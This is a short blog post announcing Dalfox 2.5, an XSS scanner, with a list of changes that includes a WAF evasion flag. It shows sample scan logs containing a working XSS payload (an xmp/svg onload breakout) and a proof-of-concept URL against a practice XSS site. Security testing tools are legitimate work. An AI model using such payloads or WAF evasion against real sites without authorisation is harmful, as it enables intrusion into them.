Featured image of post Dalfox 2.5 Released ๐Ÿš€

Dalfox 2.5 Released ๐Ÿš€

There was a released minor version of Dalfox after a long time. Mainly performance improvement, it detects much better than before :D

https://github.com/hahwul/dalfox/releases/tag/v2.5.0

  • Improve scanning
  • Improve mining
  • Improve logger and output
  • Improve silence mode (progress)
  • Improve structure of the document page and add contents\
  • Add WAF Detection and Evasion (--waf-evasion flag)
  • and Fixed bugs

Added Injection point in Log

[I] Reflected query param => PTYPE: URL  Injected: /inHTML-none(1)  {  \  +  =  )  `  :  <  [  (  "  ,  .  ]  ;  |  -  '  >  }  $
    13 line:  Sorry, no results were found for <b>1234DalFox</b>. <a href='?'>Try again
[V] Triggered XSS Payload (found DOM Object): query=<xmp><p title="</xmp><svg/onload=alert(1) class=dalfox>
    13 line:  re found for <b>1234<xmp><p title="</xmp><svg/onload=alert(1) class=dalfox></b>.
[POC][V][GET][inHTML-none(1)-URL] https://xss-game.appspot.com/level1/frame?query=1234%3Cxmp%3E%3Cp+title%3D%22%3C%2Fxmp%3E%3Csvg%2Fonload%3Dalert%281%29+class%3Ddalfox%3E

inHTML-none(1)-URL is injected to HTML Area from URL Query. Please check this documents

WAF Detection

[I] Found 0 testing point in DOM base parameter mining
[I] Found WAF: 360 Web Application Firewall (360)
[I] Content-Type is text/html; charset=utf-8is ๐Ÿ”
[I] Reflected PATH '/test/path/dalfoxpathtest' => Injected: /inATTR-double(1)]